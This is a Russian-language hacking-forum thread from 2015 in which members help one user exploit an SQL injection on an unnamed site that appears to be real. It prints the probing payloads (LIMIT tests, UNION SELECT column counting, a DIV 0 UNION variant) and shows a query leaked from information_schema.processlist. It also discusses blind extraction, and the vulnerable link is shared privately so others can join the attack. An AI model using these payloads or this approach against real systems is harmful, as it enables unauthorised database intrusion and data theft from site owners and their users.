Вредный скуль

Discussion in 'Песочница' started by user6334, 17 Jul 2015.

  1. user6334

    user6334 Member

    Joined:
    29 Jun 2015
    Messages:
    296
    Likes Received:
    17
    Reputations:
    12
    Всем привет! Оставив безуспешные попытки (спасибо администрации за молчание) восстановить свой аккаунт, зарегистрировался снова. Вот, теперь приходится писать в песочнице ) Но вопрос очень актуальный, так что прошу помощи. Есть SQLi, пытался раскрутить классически:
    id=1 LIMIT 1 - пустая страница
    id=1 LIMIT 2 - пустая страница
    id=1 LIMIT 3 - пустая страница
    id=1 LIMIT 4 - пустая страница
    id=1 LIMIT 5 - пустая страница
    id=1 LIMIT 6 - пустая страница
    id=1 LIMIT 7 - пустая страница
    id=1 LIMIT 8 - отображается одна строка с данными
    id=1 LIMIT 9 - две строки с данными
    id=1 LIMIT 10 - три строки с данными
    и т.д.
    Затем я подобрал число столбцов, их оказалось 7.
    1 LIMIT 1 UNION SELECT 1,2,3,4,5,6,7 - пустая страница
    1 LIMIT 2 UNION SELECT 1,2,3,4,5,6,7 - одна строка с данными
    1 LIMIT 3 UNION SELECT 1,2,3,4,5,6,7 - две строки с данными
    и т.д.
    Вывести данные из других таблиц не получается! И потом, что меня вообще убило:
    1 LIMIT 0,10 - три строки с данными
    1 LIMIT 1,10 - четыре строки с данными
    1 LIMIT 2,10 - пустая страница
     
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    а зачем LIMIT? запрос как выглядит? скорее всего, у вас там два запроса, которые выполняются одновременно. error-based не пойдет?
     
    _________________________
  3. user6334

    user6334 Member

    Joined:
    29 Jun 2015
    Messages:
    296
    Likes Received:
    17
    Reputations:
    12
    Вывод ошибок отключен. Я тоже не знаю, какого вида запрос, вот и мучаюсь.
     
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    как blind крутить можете же. сделайте запрос SELECT info FROM information_schema.processlist и посмотрите
     
    _________________________
  5. user6334

    user6334 Member

    Joined:
    29 Jun 2015
    Messages:
    296
    Likes Received:
    17
    Reputations:
    12
    Конечно, слепой скуль крутить я могу, задача как раз и состоит в том, чтобы он прозрел ). Спасибо за подсказку, сейчас попробую
     
  6. user6334

    user6334 Member

    Joined:
    29 Jun 2015
    Messages:
    296
    Likes Received:
    17
    Reputations:
    12
    SELECT `id`, `parent_id`, `href`, `params`, `anchor`, `date_created`, `subtitle` FROM `vw_menu_city_list` WHERE `language_id` = 1
    Вот такой классический запрос, ничего интересного я в нем не нашел. Кроме столбцов, которые выводятся в таблице есть еще и другие, в частности `language_id`. С чем связано такое странное поведение?
     
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    count(info) = 1?
    попробуйте id = 1 DIV 0 UNION SELECT 1,2,3,4,5,6,7-- f
     
    _________________________
  8. user6334

    user6334 Member

    Joined:
    29 Jun 2015
    Messages:
    296
    Likes Received:
    17
    Reputations:
    12
    вернулся пустой результат, в коде страницы тоже пусто
     
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    там был еще вопрос
     
    _________________________
  10. user6334

    user6334 Member

    Joined:
    29 Jun 2015
    Messages:
    296
    Likes Received:
    17
    Reputations:
    12
    да
     
  11. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    скорее всего, переменная попадает еще в условие типа
    Code:
    if (language_id = 1): echo "................";
    else echo ""
    поэтому вывод пустой. вариантов я пока что-то не вижу
     
    _________________________
  12. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    скинь ты уже скуль толпой поковыряем, ну или в пм
     
  13. user6334

    user6334 Member

    Joined:
    29 Jun 2015
    Messages:
    296
    Likes Received:
    17
    Reputations:
    12
    если бы там еще какое-нибудь условие было, то так бы, к примеру, ничего не отображалось: id=1 LIMIT 1000. Так нет же, выводиться полный список.
     
  14. user6334

    user6334 Member

    Joined:
    29 Jun 2015
    Messages:
    296
    Likes Received:
    17
    Reputations:
    12
    b3, скунул в личку
     
  15. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    Только как слепая пока что крутиться
     
  16. user6334

    user6334 Member

    Joined:
    29 Jun 2015
    Messages:
    296
    Likes Received:
    17
    Reputations:
    12
    Ну а почему мои SQL-конструкции (см. пост #1) таким образом работают? Есть хотя бы какие-то предположения?
     
  17. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    Вангу нужно звать. Кстати у меня вообще 8 колонок вышло а не 7 как у тебя.
     
  18. user6334

    user6334 Member

    Joined:
    29 Jun 2015
    Messages:
    296
    Likes Received:
    17
    Reputations:
    12
    да ладно? )
     
  19. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    ой не, это долго же блиндом будет доставать
     
  20. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    так он уже достал, #6 пост
     
    _________________________